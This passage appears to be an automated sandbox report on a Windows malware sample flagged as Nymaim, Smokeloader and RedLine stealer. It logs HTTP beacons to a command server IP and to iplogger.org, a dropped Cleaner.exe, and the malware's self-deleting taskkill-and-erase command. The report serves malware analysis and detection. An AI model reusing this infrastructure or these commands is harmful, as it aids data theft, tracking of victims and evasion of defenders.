                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=91
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                      6 | 192.168.2.5 | 49702 | 171.22.30.106 | 80 | C:\Users\user\Desktop\file.exe
                                                      Timestamp | kBytes transferred | Direction | Data
                                                      Oct 3, 2022 17:30:53.012393951 CEST | 4574 | OUT | GET /library.php HTTP/1.1
                                                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                      User-Agent: 2
                                                      Host: 171.22.30.106
                                                      Connection: Keep-Alive
                                                      Cache-Control: no-cache
                                                      Oct 3, 2022 17:30:53.548079967 CEST | 4574 | IN | HTTP/1.1 200 OK
                                                      Date: Mon, 03 Oct 2022 15:30:53 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      Content-Length: 1
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 30
                                                      Data Ascii: 0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                      0 | 192.168.2.5 | 49701 | 148.251.234.83 | 443 | C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe
                                                      Timestamp | kBytes transferred | Direction | Data
                                                      2022-10-03 15:30:47 UTC | 0 | OUT | GET /1Pz8p7 HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36
                                                      Host: iplogger.org
                                                      Connection: Keep-Alive
                                                      2022-10-03 15:30:47 UTC | 0 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Mon, 03 Oct 2022 15:30:47 GMT
                                                      Content-Type: image/png
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Set-Cookie: clhf03028ja=102.129.143.15; expires=Tue, 03-Oct-2023 15:30:47 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                      Set-Cookie: 333625791719766799=1; expires=Tue, 03-Oct-2023 15:30:47 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                      Expires: Mon, 03 Oct 2022 15:30:47 +0000
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Strict-Transport-Security: max-age=31536000
                                                      X-Frame-Options: SAMEORIGIN
                                                      2022-10-03 15:30:47 UTC | 0 | IN | Data Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`0



                                                      Target ID:0
                                                      Start time:17:29:28
                                                      Start date:03/10/2022
                                                      Path:C:\Users\user\Desktop\file.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user\Desktop\file.exe
                                                      Imagebase:0x400000
                                                      File size:238080 bytes
                                                      MD5 hash:526FDE9E61B1B4835885973331FA1616
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.309205181.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.309205181.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.324269337.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.324269337.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.303645653.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.303645653.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.313758394.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.314053861.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.314053861.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.340099417.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.340099417.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.345695495.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.303166143.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.308578404.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.313966134.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.352618407.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.318572521.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.352139791.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.352139791.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.308973675.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.339625229.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.319401695.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.337565462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.319567616.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.319567616.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.318795705.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.302663434.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.313553571.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.313553571.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.309109018.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.346627601.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.346627601.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.324683404.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000003.301103570.0000000002200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.338909457.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.338909457.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.319176574.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.352775062.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.352775062.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.324752364.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.324752364.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.324022607.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.352494062.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.313496806.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.339850258.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.337744676.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.345502074.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.346524213.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.346406888.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.313405136.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.308781752.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.308781752.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.318868933.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.318868933.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.303421378.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.345921160.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.345921160.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.324526447.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.302389344.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.351860425.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.308709997.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.352027898.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000000.302874171.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000000.302874171.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000000.324186328.0000000000739000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:low

                                                      Target ID:3
                                                      Start time:17:29:31
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 528
                                                      Imagebase:0xef0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:5
                                                      Start time:17:29:34
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 700
                                                      Imagebase:0xef0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:7
                                                      Start time:17:29:36
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 724
                                                      Imagebase:0xef0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:9
                                                      Start time:17:29:39
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 760
                                                      Imagebase:0xef0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:11
                                                      Start time:17:29:41
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 768
                                                      Imagebase:0xef0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Target ID:13
                                                      Start time:17:29:49
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 848
Imagebase: 0xef0000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 15
Start time: 17:29:52
Start date: 03/10/2022
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 840
Imagebase: 0xef0000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 17
Start time: 17:29:54
Start date: 03/10/2022
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 1032
Imagebase: 0xef0000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 19
Start time: 17:30:19
Start date: 03/10/2022
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 1292
Imagebase: 0xef0000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 20
Start time: 17:30:20
Start date: 03/10/2022
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 21
Start time: 17:30:21
Start date: 03/10/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7fcd70000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 22
Start time: 17:30:21
Start date: 03/10/2022
Path: C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\6clvSx8en71SUl1hUuzQ6n56lWM0\Cleaner.exe"
Imagebase: 0x1cfc72f0000
File size: 3947920 bytes
MD5 hash: 04514BD4962F7D60679434E0EBE49184
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Antivirus matches:
• Detection: 29%, ReversingLabs

Target ID: 26
Start time: 17:30:51
Start date: 03/10/2022
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 1552
Imagebase: 0xef0000
File size: 434592 bytes
MD5 hash: 9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 27
Start time: 17:30:55
Start date: 03/10/2022
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 28
Start time: 17:30:56
Start date: 03/10/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7fcd70000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 29
Start time: 17:30:56
Start date: 03/10/2022
Path: C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit): true
Commandline: taskkill /im "file.exe" /f
Imagebase: 0x130000
File size: 74752 bytes
MD5 hash: 15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

No disassembly